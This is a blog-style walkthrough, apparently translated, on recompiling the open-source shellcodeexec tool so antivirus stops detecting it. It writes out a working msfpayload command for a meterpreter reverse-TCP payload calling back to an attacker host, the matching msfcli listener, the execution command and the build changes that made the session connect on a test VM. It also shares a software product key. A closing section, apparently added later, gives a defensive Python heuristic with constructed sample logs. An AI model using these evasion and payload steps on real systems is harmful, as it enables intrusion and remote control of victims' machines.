shellcodeexec: recompiling it to evade antivirus

An earlier post described using shellcodeexec.exe to run Metasploit shellcode. In practice, though, antivirus software simply kills shellcodeexec.exe, so that method is no longer usable. Fortunately shellcodeexec is open source, so we can compile it ourselves.
My build environment has Visual Studio 2010 installed.
Here is the download link for the Chinese Ultimate edition, together with its serial number:

http://download.microsoft.com/download/E/0/4/E0427BB8-8490-4C7F-A05B-AFEA0FC3EA80/X16-60997VS2010UltimTrialCHS.iso YCFHQ-9DWCY-DKV88-T2TMH-G7BHP

You also need to install the Microsoft Platform SDK for Windows Server 2003 R2.

After installing it, add an environment variable:

Sample value:
--------------------------------------------------------------------------
Variable name			Variable value
--------------------------------------------------------------------------
PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2

Double-clicking shellcodeexec.sln prompts for a project conversion, because the author's development environment was Visual Studio 2005.
Once the conversion finishes, press F7 to build. Afterwards a scan with Rising reports no virus. In fact, many open-source hack tools can get past antivirus just by being rebuilt with a different compiler; some, of course, need a few source changes.

Next, generate the shellcode on Kali and test it locally:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=80 LHOST=192.168.1.7 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

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

Start the listener:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=80 LHOST=192.168.1.7 E

Run it locally:

x:\vs2010l\Projects\shellcodeexec-win\Release\shellcodeexec.exe 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

shellcodeexec

Copying shellcodeexec.exe to a 32-bit Windows 2003 R2 virtual machine and running it gives an error that msvcr100.dll is missing.
So I switched to linking the C runtime statically so that msvcr100.dll is no longer required.
Steps: in VC++ 2010 press ALT+F7, then go to Configuration Properties -> C/C++ -> Code Generation -> Runtime Library and set it to Multi-threaded (/MT).

After rebuilding, the binary grows to 40K+. Copied to the virtual machine and executed, the session came back...

When the payload is being delivered, it seems to trigger the active defense of some antivirus products...
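From the defender's side, the observation above is the useful part: rebuilding the tool changes its file hash, so signature matching on shellcodeexec.exe fails, but the execution pattern itself (a process launched with one very long, purely alphanumeric argument, which is exactly what an x86/alpha_mixed payload looks like on the command line) is unchanged. The following is an added example, not code from the original post or from the shellcodeexec project; it flags that pattern in process-creation records. The "<timestamp> <image path> <command line>" record layout and all sample lines are constructed for illustration, and the 634-character blob is a constructed stand-in, not shellcode.

```python
"""Added example (not from the original post): a detection heuristic for the
execution pattern described above, where an x86/alpha_mixed-encoded payload is
passed to shellcodeexec.exe as a single command-line argument. The log lines
below are constructed for illustration and are not real telemetry."""
import string

# A real alpha_mixed payload is one long run of letters and digits (the post's
# is 634 bytes). Ordinary arguments are far shorter, so a single token of this
# length made only of [A-Za-z0-9] is a strong signal worth reviewing.
MIN_TOKEN_LEN = 200
ALNUM = frozenset(string.ascii_letters + string.digits)


def _constructed_alnum_blob(length):
    """Deterministic stand-in for an encoded payload: a constructed alphanumeric
    string of the given length. It is NOT shellcode and does nothing."""
    alphabet = string.ascii_letters + string.digits
    return "".join(alphabet[(i * 7) % len(alphabet)] for i in range(length))


# Constructed process-creation records: "<timestamp> <image path> <command line>".
# The assumed record layout is an illustration, not any product's log format.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00 C:\\Windows\\System32\\cmd.exe cmd.exe /c dir C:\\Users",
    "2024-01-01T10:00:05 C:\\tools\\shellcodeexec.exe shellcodeexec.exe "
    + _constructed_alnum_blob(634),
    # Long argument, but a URL contains '/', '.' and ':' so it must not be flagged.
    "2024-01-01T10:00:09 C:\\Windows\\System32\\curl.exe curl.exe -o out.bin http://"
    + "/".join(["example.invalid"] + ["segment"] * 40),
    "2024-01-01T10:00:12 C:\\Python27\\python.exe python.exe -c \"print('hello')\"",
]


def parse_event(line):
    """Split a record into (timestamp, image, command line). The command line is
    everything after the image path and may itself contain spaces."""
    timestamp, image, cmdline = line.split(" ", 2)
    return timestamp, image, cmdline


def long_alnum_tokens(cmdline, min_len=MIN_TOKEN_LEN):
    """Return command-line tokens that are at least min_len characters long and
    consist solely of ASCII letters and digits."""
    return [tok for tok in cmdline.split()
            if len(tok) >= min_len and set(tok) <= ALNUM]


def find_suspicious(events, min_len=MIN_TOKEN_LEN):
    """Scan records and report those carrying a long alphanumeric argument."""
    hits = []
    for line in events:
        timestamp, image, cmdline = parse_event(line)
        tokens = long_alnum_tokens(cmdline, min_len)
        if tokens:
            hits.append({
                "timestamp": timestamp,
                "image": image,
                "token_len": max(len(t) for t in tokens),
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("suspicious: %(timestamp)s %(image)s argument length %(token_len)d" % hit)
```

Only the shellcodeexec record is reported; the cmd, curl and python records pass because their arguments are either short or contain punctuation. The threshold is deliberately a tunable: long base64 or hex blobs in legitimate tooling can look similar, so in production this rule belongs with an allow-list of known images rather than as a blocking control on its own.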
